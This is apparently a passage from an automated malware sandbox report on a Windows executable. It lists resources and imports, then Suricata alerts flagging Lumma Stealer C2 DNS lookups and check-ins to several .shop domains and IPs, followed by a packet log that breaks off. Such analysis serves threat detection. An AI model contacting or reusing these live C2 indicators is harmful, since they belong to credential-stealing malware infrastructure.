                                                                        RT_STRING0x3797400x84dataEnglishGreat Britain0.7424242424242424
                                                                        RT_STRING0x3797c40x2c2dataEnglishGreat Britain0.41076487252124644
                                                                        RT_STRING0x379a880x178Matlab v4 mat-file (little endian) K, numeric, rows 0, columns 0EnglishGreat Britain0.5132978723404256
                                                                        RT_STRING0x379c000x2c8dataEnglishGreat Britain0.4705056179775281
                                                                        RT_STRING0x379ec80xe2AmigaOS bitmap font "s", 16640 elements, 2nd, 3rdEnglishGreat Britain0.5265486725663717
                                                                        RT_STRING0x379fac0x138Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0EnglishGreat Britain0.5
                                                                        RT_STRING0x37a0e40x46dataEnglishGreat Britain0.6857142857142857
                                                                        RT_STRING0x37a12c0xfcdataEnglishGreat Britain0.5634920634920635
                                                                        RT_STRING0x37a2280x416dataEnglishGreat Britain0.4435946462715105
                                                                        RT_STRING0x37a6400x26dataEnglishGreat Britain0.42105263157894735
                                                                        RT_STRING0x37a6680x192dataEnglishGreat Britain0.5149253731343284
                                                                        RT_STRING0x37a7fc0x126dataEnglishGreat Britain0.6020408163265306
                                                                        RT_STRING0x37a9240x31edataEnglishGreat Britain0.41729323308270677
                                                                        RT_STRING0x37ac440x9aMatlab v4 mat-file (little endian) I, numeric, rows 0, columns 0EnglishGreat Britain0.6558441558441559
                                                                        RT_STRING0x37ace00x5cdataEnglishGreat Britain0.7065217391304348
                                                                        RT_STRING0x37ad3c0xaedataEnglishGreat Britain0.6551724137931034
                                                                        RT_STRING0x37adec0x6cdataEnglishGreat Britain0.6944444444444444
                                                                        RT_STRING0x37ae580x11cdataEnglishGreat Britain0.6126760563380281
                                                                        RT_STRING0x37af740x238Targa image data 110 x 116 x 32 +99 +101EnglishGreat Britain0.5017605633802817
                                                                        RT_STRING0x37b1ac0x16adataEnglishGreat Britain0.5497237569060773
                                                                        RT_STRING0x37b3180x19cdataEnglishGreat Britain0.5
                                                                        RT_STRING0x37b4b40x5cdataEnglishGreat Britain0.6413043478260869
                                                                        RT_STRING0x37b5100x6a0dataEnglishGreat Britain0.35200471698113206
                                                                        RT_STRING0x37bbb00x5cdataEnglishGreat Britain0.7065217391304348
                                                                        RT_STRING0x37bc0c0x1e8dataEnglishGreat Britain0.514344262295082
                                                                        RT_STRING0x37bdf40x58dataEnglishGreat Britain0.6931818181818182
                                                                        RT_STRING0x37be4c0x1e0dataEnglishGreat Britain0.4666666666666667
                                                                        RT_STRING0x37c02c0x22adataEnglishGreat Britain0.37906137184115524
                                                                        RT_STRING0x37c2580x672Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0EnglishGreat Britain0.18424242424242424
                                                                        RT_STRING0x37c8cc0xdb8dataEnglishGreat Britain0.10763097949886105
                                                                        RT_STRING0x37d6840x108dataEnglishGreat Britain0.375
                                                                        RT_STRING0x37d78c0x14adataEnglishGreat Britain0.5878787878787879
                                                                        RT_STRING0x37d8d80x276dataEnglishGreat Britain0.4365079365079365
                                                                        RT_STRING0x37db500x186dataEnglishGreat Britain0.517948717948718
                                                                        RT_STRING0x37dcd80x3c6dataEnglishGreat Britain0.40372670807453415
                                                                        RT_STRING0x37e0a00x4edataEnglishGreat Britain0.6538461538461539
                                                                        RT_STRING0x37e0f00x244data0.4810344827586207
                                                                        RT_STRING0x37e3340x3f4data0.3922924901185771
                                                                        RT_STRING0x37e7280x71cdata0.3423076923076923
                                                                        RT_STRING0x37ee440xbf0data0.23036649214659685
                                                                        RT_STRING0x37fa340x420data0.3475378787878788
                                                                        RT_STRING0x37fe540x33cdata0.38768115942028986
                                                                        RT_STRING0x3801900x430data0.4048507462686567
                                                                        RT_STRING0x3805c00xd4data0.6698113207547169
                                                                        RT_STRING0x3806940xccdata0.6715686274509803
                                                                        RT_STRING0x3807600x128data0.6013513513513513
                                                                        RT_STRING0x3808880x350data0.42806603773584906
                                                                        RT_STRING0x380bd80x40cdata0.36196911196911197
                                                                        RT_STRING0x380fe40x3c0data0.3885416666666667
                                                                        RT_STRING0x3813a40x340data0.33052884615384615
                                                                        RT_STRING0x3816e40x444data0.4157509157509158
                                                                        RT_STRING0x381b280x680data0.34194711538461536
                                                                        RT_STRING0x3821a80x498data0.32908163265306123
                                                                        RT_STRING0x3826400x318data0.41414141414141414
                                                                        RT_STRING0x3829580x340data0.35697115384615385
                                                                        RT_STRING0x382c980x3e0data0.39314516129032256
                                                                        RT_STRING0x3830780x19cdata0.441747572815534
                                                                        RT_STRING0x3832140xccdata0.6274509803921569
                                                                        RT_STRING0x3832e00x198data0.5612745098039216
                                                                        RT_STRING0x3834780x3c8data0.37913223140495866
                                                                        RT_STRING0x3838400x408data0.3313953488372093
                                                                        RT_STRING0x383c480x318data0.3787878787878788
                                                                        RT_STRING0x383f600x31cdata0.34296482412060303
                                                                        RT_ACCELERATOR0x38427c0x70dataEnglishGreat Britain0.6785714285714286
                                                                        RT_RCDATA0x3842ec0x10data1.5
                                                                        RT_RCDATA0x3842fc0x748data0.5198497854077253
                                                                        RT_RCDATA0x384a440x2dataEnglishUnited States5.0
                                                                        RT_RCDATA0x384a480x415c8TrueType Font data, 19 tables, 1st "GPOS", 16 names, Macintosh, \(g\)\252 fonts 1999\251ElektraMediumTransType 3 MAC;Elektra;001.000;18/07/06 23:22:47ElektraVerEnglishUnited States0.10237935156133274
                                                                        RT_RCDATA0x3c60100x5f80TrueType Font data, 15 tables, 1st "OS/2", 21 names, UnicodeEnglishUnited States0.3445271596858639
                                                                        RT_RCDATA0x3cbf900x48f6Delphi compiled form 'TQt5QWindowOwnDCIcon'0.6848699004176036
                                                                        RT_GROUP_CURSOR0x3d08880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                        RT_GROUP_CURSOR0x3d089c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d08b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                        RT_GROUP_CURSOR0x3d08c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d08d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d08ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d09000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d09140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_ICON0x3d09280x4cdataEnglishUnited States0.75
                                                                        RT_VERSION0x3d09740x2e8dataEnglishUnited States0.40053763440860213
                                                                        RT_DLGINCLUDE0x3d0c5c0x59236PC bitmap, Windows 3.x format, 46076 x 2 x 37, image size 365936, cbSize 365110, bits offset 540.7019939196406563
                                                                        RT_ANIICON0x429e940xb925PC bitmap, Windows 3.x format, 6090 x 2 x 47, image size 47566, cbSize 47397, bits offset 540.4692491085933709
                                                                        RT_ANIICON0x4357bc0x9c23PC bitmap, Windows 3.x format, 5713 x 2 x 46, image size 40204, cbSize 39971, bits offset 540.3640639463611118
                                                                        RT_ANIICON0x43f3e00xacc8PC bitmap, Windows 3.x format, 6090 x 2 x 46, image size 44832, cbSize 44232, bits offset 540.3851510218846084
                                                                        RT_ANIICON0x44a0a80x348e1PC bitmap, Windows 3.x format, 27559 x 2 x 54, image size 215900, cbSize 215265, bits offset 540.47608761294218754
                                                                        RT_ANIICON0x47e98c0x2e8d3PC bitmap, Windows 3.x format, 24824 x 2 x 52, image size 191526, cbSize 190675, bits offset 540.48223416808705916

                                                                        Imports

                                                                        DLLImport
                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                        advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                        user32.dllMessageBoxA, CharNextW, LoadStringW
                                                                        kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, SetCurrentDirectoryW, GetCurrentDirectoryW, WriteFile, GetStdHandle, CloseHandle
                                                                        kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                                                                        user32.dllSetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExW, mouse_event, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                        gdi32.dllWidenPath, UnrealizeObject, TextOutW, StrokePath, StrokeAndFillPath, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextCharacterExtra, SetTextColor, SetTextAlign, SetStretchBltMode, SetROP2, SetPixel, SetGraphicsMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetArcDirection, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SelectClipPath, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, PtVisible, PolylineTo, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PathToRegion, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetViewportOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetTextColor, GetTextCharacterExtra, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, GdiFlush, FrameRgn, FillPath, ExtTextOutW, ExtSelectClipRgn, ExtFloodFill, ExtCreateRegion, ExtCreatePen, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPath, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRoundRectRgn, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateEllipticRgnIndirect, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, CloseFigure, Chord, BitBlt, BeginPath, ArcTo, Arc, AngleArc, AbortDoc
                                                                        version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                        kernel32.dllWritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReadFile, RaiseException, IsDebuggerPresent, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetTickCount, GetThreadPriority, GetThreadLocale, GetSystemInfo, GetSystemTimes, GetStdHandle, GetProcAddress, GetPrivateProfileStringW, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringW, CloseHandle, Beep
                                                                        advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                                                                        kernel32.dllSleep
                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                        oleaut32.dllGetErrorInfo, SysFreeString
                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                                                                        comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                        user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                                                                        msvcrt.dllmemset, memcpy
                                                                        shell32.dllShell_NotifyIconW
                                                                        winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                                                                        winspool.drvGetDefaultPrinterW
                                                                        winmm.dlltimeGetTime

                                                                        Exports

                                                                        NameOrdinalAddress
                                                                        TMethodImplementationIntercept10x461524

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishGreat Britain
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-09-26T21:26:16.070452+02002056162ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)1192.168.2.4549401.1.1.153UDP
                                                                        2024-09-26T21:26:16.584078+02002056163ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)1192.168.2.449734188.114.97.3443TCP
                                                                        2024-09-26T21:26:17.076987+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449734188.114.97.3443TCP
                                                                        2024-09-26T21:26:17.076987+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734188.114.97.3443TCP
                                                                        2024-09-26T21:26:17.088211+02002056164ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)1192.168.2.4534091.1.1.153UDP
                                                                        2024-09-26T21:26:17.624090+02002056165ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)1192.168.2.449736104.21.4.136443TCP
                                                                        2024-09-26T21:26:18.061879+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736104.21.4.136443TCP
                                                                        2024-09-26T21:26:18.061879+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.4.136443TCP
                                                                        2024-09-26T21:26:18.561343+02002056163ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)1192.168.2.449738188.114.97.3443TCP
                                                                        2024-09-26T21:26:18.985344+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449738188.114.97.3443TCP
                                                                        2024-09-26T21:26:18.985344+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738188.114.97.3443TCP
                                                                        2024-09-26T21:26:18.999445+02002056160ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)1192.168.2.4617181.1.1.153UDP
                                                                        2024-09-26T21:26:19.520948+02002056161ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)1192.168.2.449739188.114.97.3443TCP
                                                                        2024-09-26T21:26:19.968358+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449739188.114.97.3443TCP
                                                                        2024-09-26T21:26:19.968358+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739188.114.97.3443TCP
                                                                        2024-09-26T21:26:20.003264+02002056158ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)1192.168.2.4549991.1.1.153UDP
                                                                        2024-09-26T21:26:20.494914+02002056159ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)1192.168.2.449740188.114.96.3443TCP
                                                                        2024-09-26T21:26:20.986518+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449740188.114.96.3443TCP
                                                                        2024-09-26T21:26:20.986518+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449740188.114.96.3443TCP
                                                                        2024-09-26T21:26:21.498032+02002056156ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)1192.168.2.4602901.1.1.153UDP
                                                                        2024-09-26T21:26:21.992400+02002056157ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)1192.168.2.449741172.67.162.108443TCP
                                                                        2024-09-26T21:26:22.456694+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449741172.67.162.108443TCP
                                                                        2024-09-26T21:26:22.456694+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741172.67.162.108443TCP
                                                                        2024-09-26T21:26:22.460224+02002056154ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)1192.168.2.4537981.1.1.153UDP
                                                                        2024-09-26T21:26:22.980219+02002056155ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)1192.168.2.449742188.114.97.3443TCP
                                                                        2024-09-26T21:26:23.482099+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449742188.114.97.3443TCP
                                                                        2024-09-26T21:26:23.482099+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449742188.114.97.3443TCP
                                                                        2024-09-26T21:26:23.625768+02002056152ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)1192.168.2.4522891.1.1.153UDP
                                                                        2024-09-26T21:26:24.184473+02002056153ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)1192.168.2.449743188.114.96.3443TCP
                                                                        2024-09-26T21:26:24.736633+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449743188.114.96.3443TCP
                                                                        2024-09-26T21:26:24.736633+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743188.114.96.3443TCP
                                                                        2024-09-26T21:26:24.738372+02002056150ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)1192.168.2.4523591.1.1.153UDP
                                                                        2024-09-26T21:26:25.242032+02002056151ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)1192.168.2.449744172.67.208.139443TCP
                                                                        2024-09-26T21:26:25.664023+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449744172.67.208.139443TCP
                                                                        2024-09-26T21:26:25.664023+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744172.67.208.139443TCP
                                                                        2024-09-26T21:26:28.033341+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449746172.67.128.144443TCP
                                                                        2024-09-26T21:26:28.033341+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746172.67.128.144443TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Sep 26, 2024 21:26:16.108561039 CEST49734443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:16.108609915 CEST44349734188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:16.108690977 CEST49734443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:16.113039970 CEST49734443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:16.113059998 CEST44349734188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:16.584002972 CEST44349734188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:16.584078074 CEST49734443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:16.587587118 CEST49734443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:16.587605000 CEST44349734188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:16.588032961 CEST44349734188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:16.642267942 CEST49734443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:16.642337084 CEST49734443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:16.642487049 CEST44349734188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:17.077060938 CEST44349734188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:17.077286005 CEST44349734188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:17.077380896 CEST49734443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:17.079391956 CEST49734443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:17.079426050 CEST44349734188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:17.107861042 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:17.107901096 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:17.107994080 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:17.108330011 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:17.108340979 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:17.623980045 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:17.624089956 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:17.630017996 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:17.630033970 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:17.630435944 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:17.637546062 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:17.637727022 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:17.637793064 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:18.061585903 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:18.061791897 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:18.061897993 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:18.062787056 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:18.062787056 CEST49736443192.168.2.4104.21.4.136
                                                                        Sep 26, 2024 21:26:18.062803030 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:18.062809944 CEST44349736104.21.4.136192.168.2.4
                                                                        Sep 26, 2024 21:26:18.083444118 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.083467960 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:18.083585024 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.092777014 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.092787027 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:18.561261892 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:18.561342955 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.562421083 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.562444925 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:18.562812090 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:18.569822073 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.569840908 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.569997072 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:18.985371113 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:18.985518932 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:18.985586882 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.985790014 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.985809088 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:18.985817909 CEST49738443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:18.985824108 CEST44349738188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:19.027756929 CEST49739443192.168.2.4188.114.97.3
